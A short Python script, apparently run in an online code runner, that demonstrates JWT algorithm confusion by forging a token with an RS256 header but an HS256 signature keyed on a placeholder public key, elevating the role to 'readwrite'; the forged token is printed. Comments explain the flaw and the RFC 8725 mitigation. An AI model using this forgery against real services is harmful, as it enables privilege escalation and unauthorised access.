# Demonstration of JWT algorithm confusion (key-type confusion): the token's
# header advertises RS256 while the signature is actually an HS256 HMAC computed
# with the verifier's *public* key string as the secret. A verifier is only
# affected if it lets the token header choose the verification algorithm; the
# mitigation is to pin the accepted algorithms on decode (PyJWT's
# `algorithms=[...]`) and to never accept asymmetric key material as an HMAC
# secret. See RFC 8725 (JWT Best Current Practices) for the defensive guidance.
import jwt

# Placeholder public key (replace with actual key if available)
# NOTE(review): this is a constructed placeholder string, not PEM. Newer PyJWT
# releases refuse PEM-formatted public keys as HMAC secrets (InvalidKeyError);
# a plain string like this one does not trip that guard — confirm against the
# installed version.
public_key = "place_holder_public_key"

# JWT payload with desired role
# The payload is only base64url-encoded, not encrypted: anyone holding the token
# can read both claims (the second segment of the captured stdout below).
payload = {
"login": "testtest321",
"role": "readwrite"
}

# Create JWT with RS256 algorithm in header but sign with HS256 using the public key
# `headers` is merged over the header PyJWT derives from `algorithm`, so the
# emitted header claims alg=RS256 (the first stdout segment decodes to
# {"typ":"JWT","alg":"RS256"}) even though the signature is HMAC-SHA256.
malicious_jwt = jwt.encode(payload, public_key, algorithm="HS256", headers={"alg": "RS256"})

# The captured stdout shows a bytes repr (b'...'), which suggests a PyJWT 1.x
# `encode` (2.x returns str) — TODO confirm the pinned version.
print(malicious_jwt)
stdin
1
2
10
42
11
stdout
b'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6InRlc3R0ZXN0MzIxIiwicm9sZSI6InJlYWR3cml0ZSJ9.hx2BXyOR04ik-IBDQB08rRYF96bydwA04AqYJ04xy2g'